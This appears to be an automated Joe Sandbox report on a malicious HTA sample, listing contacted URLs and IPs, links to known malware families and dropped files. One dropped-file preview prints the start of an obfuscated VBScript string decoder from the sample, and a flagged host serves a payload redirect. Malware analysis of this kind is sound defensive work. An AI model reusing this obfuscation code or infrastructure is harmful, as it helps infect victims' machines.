00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://images-americanas.b2w.io/spacey/acom/2024/12/04/5-banners_home_mob-campanhas-home-300x450-86mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458620748.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484992429.0000000009565000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.000000000946C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484951411.0000000009561000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317721237.000000000678A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.pngGmshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.pngRmshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://www.americanas.com.br/categoria/enfeites-de-natal/toalha-de-mesa-natalinamshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379542505.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459467924.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460957598.000000000AC7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464533482.000000000AC80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465519624.000000000AC82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488496284.000000000AC82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          52.95.165.10
                                                                                                                                                                                                                          s3-sa-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                          142.250.189.226
                                                                                                                                                                                                                          securepubads.g.doubleclick.netUnited States
                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                          3.5.232.230
                                                                                                                                                                                                                          s3-r-w.sa-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                          92.205.57.102
                                                                                                                                                                                                                          102.57.205.92.host.secureserver.netGermany
                                                                                                                                                                                                                          8972GD-EMEA-DC-SXB1DEtrue
                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                          Analysis ID:1579831
                                                                                                                                                                                                                          Start date and time:2024-12-23 10:46:26 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 7m 7s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                                          Run name:Potential for more IOCs and behavior
                                                                                                                                                                                                                          Number of analysed new started processes analysed:10
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:Archivo-PxFkiLTWYG-23122024095010.hta
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal76.evad.winHTA@17/9@7/4
                                                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                          • Successful, ratio: 93%
                                                                                                                                                                                                                          • Number of executed functions: 107
                                                                                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .hta
                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.251.46.232, 23.216.149.204, 23.216.149.214, 23.212.62.203, 23.212.62.205
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): e96427.dscb.akamaiedge.net, www.googletagmanager.com, ctldl.windowsupdate.com, sni-wildsan.b2wdigital.com.edgekey.net, static.criteo.net
                                                                                                                                                                                                                          • Execution Graph export aborted for target mshta.exe, PID 6236 because there are no executed function
                                                                                                                                                                                                                          • Execution Graph export aborted for target wscript.exe, PID 5388 because there are no executed function
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                          • VT rate limit hit for: Archivo-PxFkiLTWYG-23122024095010.hta
                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          04:48:54API Interceptor2x Sleep call for process: mshta.exe modified
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          92.205.57.102Factura - XwgyvMuOAO.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            s3-r-w.sa-east-1.amazonaws.comdecrypt-main.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 52.95.163.36
                                                                                                                                                                                                                            decrypt-main.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.1.62
                                                                                                                                                                                                                            appdata -MpSvc.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.5.234.32
                                                                                                                                                                                                                            appdata -MpSvc.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.5.233.174
                                                                                                                                                                                                                            00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.5.232.137
                                                                                                                                                                                                                            00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.1.14
                                                                                                                                                                                                                            0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.5.232.21
                                                                                                                                                                                                                            102.57.205.92.host.secureserver.netFactura - XwgyvMuOAO.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            GD-EMEA-DC-SXB1DEhmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 188.138.99.78
                                                                                                                                                                                                                            https://atc-secure.com/nocod/wetransdnyd.html#k.muench@muenchundmuench.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 92.205.22.61
                                                                                                                                                                                                                            236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 91.250.85.177
                                                                                                                                                                                                                            bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 85.25.248.167
                                                                                                                                                                                                                            bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 85.25.248.111
                                                                                                                                                                                                                            bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 62.138.132.153
                                                                                                                                                                                                                            armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 62.75.161.26
                                                                                                                                                                                                                            AMAZON-02USFBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 185.166.143.50
                                                                                                                                                                                                                            armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 108.159.159.70
                                                                                                                                                                                                                            BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 185.166.143.48
                                                                                                                                                                                                                            jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 52.216.152.124
                                                                                                                                                                                                                            mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 185.166.143.49
                                                                                                                                                                                                                            LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 185.166.143.49
                                                                                                                                                                                                                            zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 52.217.67.100
                                                                                                                                                                                                                            Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 52.217.18.140
                                                                                                                                                                                                                            AMAZON-02USFBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 185.166.143.50
                                                                                                                                                                                                                            armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 108.159.159.70
                                                                                                                                                                                                                            BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 185.166.143.48
                                                                                                                                                                                                                            jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 52.216.152.124
                                                                                                                                                                                                                            mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 185.166.143.49
                                                                                                                                                                                                                            LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 185.166.143.49
                                                                                                                                                                                                                            zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 52.217.67.100
                                                                                                                                                                                                                            Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 52.217.18.140
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eacronis recovery expert deluxe 1.0.0.132.rarl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 52.95.165.10
                                                                                                                                                                                                                            Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 52.95.165.10
                                                                                                                                                                                                                            YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 52.95.165.10
                                                                                                                                                                                                                            YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 52.95.165.10
                                                                                                                                                                                                                            nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 52.95.165.10
                                                                                                                                                                                                                            7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 52.95.165.10
                                                                                                                                                                                                                            6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 52.95.165.10
                                                                                                                                                                                                                            FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 52.95.165.10
                                                                                                                                                                                                                            lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 52.95.165.10
                                                                                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 142.250.189.226
                                                                                                                                                                                                                            • 3.5.232.230
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 142.250.189.226
                                                                                                                                                                                                                            • 3.5.232.230
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 142.250.189.226
                                                                                                                                                                                                                            • 3.5.232.230
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 142.250.189.226
                                                                                                                                                                                                                            • 3.5.232.230
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 142.250.189.226
                                                                                                                                                                                                                            • 3.5.232.230
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 142.250.189.226
                                                                                                                                                                                                                            • 3.5.232.230
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 142.250.189.226
                                                                                                                                                                                                                            • 3.5.232.230
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 142.250.189.226
                                                                                                                                                                                                                            • 3.5.232.230
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                            • 142.250.189.226
                                                                                                                                                                                                                            • 3.5.232.230
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (2992), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):25784
                                                                                                                                                                                                                            Entropy (8bit):5.9409418084696535
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:CHt9QuIiMthnlMOaqmor53NATaETw5LwH2LhH8HRLXHkHu:CHtgH/1aWKXh
                                                                                                                                                                                                                            MD5:EDAF017BCFCC93CF1703204E6C17F170
                                                                                                                                                                                                                            SHA1:44043769E0644B0EC609648B668C3D93EE589CBC
                                                                                                                                                                                                                            SHA-256:AA0E004DE42D0CBA10D161D918D6EF70E8F9BC139EB6001E8253D586BF913F31
                                                                                                                                                                                                                            SHA-512:5D71B66A5A545861E0DDA4DB0EBF346451EC23EEB9098ED34CA0CA70A168D3B8AC8105B24CD269991765DF4D300818DEC46970EDC784E3BED659D5B4AC5F551E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8" ?>..<component id="component2">......<script language="VBScript">..<![CDATA[......function derMvyu1RArbaJKpD_17(yoiGnzNuotjNUZF_26, NsBHqFxU_1)..Dim UIrbznYRcm_27, ydoRWRevz4WAV68_28..UIrbznYRcm_27 = asc(Mid(yoiGnzNuotjNUZF_26,1,1)) - 65..yoiGnzNuotjNUZF_26 = Mid(yoiGnzNuotjNUZF_26,2,Len(yoiGnzNuotjNUZF_26)-1)..Dim okv5Im6_29..Dim YRjit7ps22BOPv_30..ydoRWRevz4WAV68_28 = "".. while (Len(yoiGnzNuotjNUZF_26) > 0).. xs9zk0JwFDjyiTpiN_80 = Mid(yoiGnzNuotjNUZF_26,1,1) .. okv5Im6_29 = (asc(xs9zk0JwFDjyiTpiN_80)-65) .. YRjit7ps22BOPv_30 = (asc(Mid(yoiGnzNuotjNUZF_26,2,1))-65).. ydoRWRevz4WAV68_28 = ydoRWRevz4WAV68_28 & (Chr(( (okv5Im6_29) * 25 + YRjit7ps22BOPv_30 - UIrbznYRcm_27 - NsBHqFxU_1))) .. yoiGnzNuotjNUZF_26 = Mid(yoiGnzNuotjNUZF_26,3,Len(yoiGnzNuotjNUZF_26)-2).... wEnd.. .. derMvyu1RArbaJKpD_17 = ydoRWRevz4WAV68_28..end function........const NsBHqFxU_1 = 92..QpR7Mdj_2 = derMvyu1RArbaJKpD_17("SGJ" , NsBHqFxU_1)..COWAYMiOP6RN_
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 36 x 38
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1062
                                                                                                                                                                                                                            Entropy (8bit):4.517838839626174
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                                                                                                                                                                                                            MD5:124A9E7B6976F7570134B7034EE28D2B
                                                                                                                                                                                                                            SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                                                                                                                                                                                                            SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                                                                                                                                                                                                            SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1706
                                                                                                                                                                                                                            Entropy (8bit):5.274543201400288
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                                                                                                                                                                                                            MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                                                                                                                                                                                                            SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                                                                                                                                                                                                            SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                                                                                                                                                                                                            SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):357
                                                                                                                                                                                                                            Entropy (8bit):5.209832565354849
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPtrLFwWtHGQcXnMKR+knLFwWtHGQcXNKzm8oD:J0+ox0RJWWPD9Qp0qp92Qm8+
                                                                                                                                                                                                                            MD5:8D156A3026840157CA292D51F52152BC
                                                                                                                                                                                                                            SHA1:6314B3E015735F52A605CA45608CD14F95FEF6A0
                                                                                                                                                                                                                            SHA-256:CA74AE119560729490CBA0ECEE5FD787F05ACACFDC56E675C262A77DD827263C
                                                                                                                                                                                                                            SHA-512:A4B7308A1DED43C6BBDB54DA93A850CF0590E9170827ED7AD968490AE9FC46114BB5CFEB081AFB901BBD1AF6257D7DE4A98638995DC6E0D67E781D37BC7C1EB0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://102.57.205.92.host.secureserver.net/g1/">here</a>.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at 102.57.205.92.host.secureserver.net Port 443</address>.</body></html>.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32138)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):105873
                                                                                                                                                                                                                            Entropy (8bit):5.604400254513248
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:NZOfIApQCjPBY7crnrhtnywq9Av6LJ0KOPqrCvBX:WIAB4dYvBX
                                                                                                                                                                                                                            MD5:2E53C6055AE4DD7E8899A649A181BC2B
                                                                                                                                                                                                                            SHA1:76F22CF7CBC90C779B7D9F58D192A79AE0F22B9C
                                                                                                                                                                                                                            SHA-256:4D7CEBCC8BF9132489831C049AAB06918A2FA660A150B3B165231D1EA8350600
                                                                                                                                                                                                                            SHA-512:48EF20C4CAB40BD7404430FC9D4F8D37DBD7B159D322E07C55F116AFE718C4B324A733F0FE361B94D949C7A2D3BB05A36849BF984EDDF9CD4D9052B50BE02DB7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},u=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (39875)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):409164
                                                                                                                                                                                                                            Entropy (8bit):5.572673727485108
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:Px7jMGmBYnsbQB5Z1HcRCrGRe5NAaa0Mf3/eNO9:RMpbO57Hc8Se5a5
                                                                                                                                                                                                                            MD5:8118E04C9627F37076178ECDCA5710E2
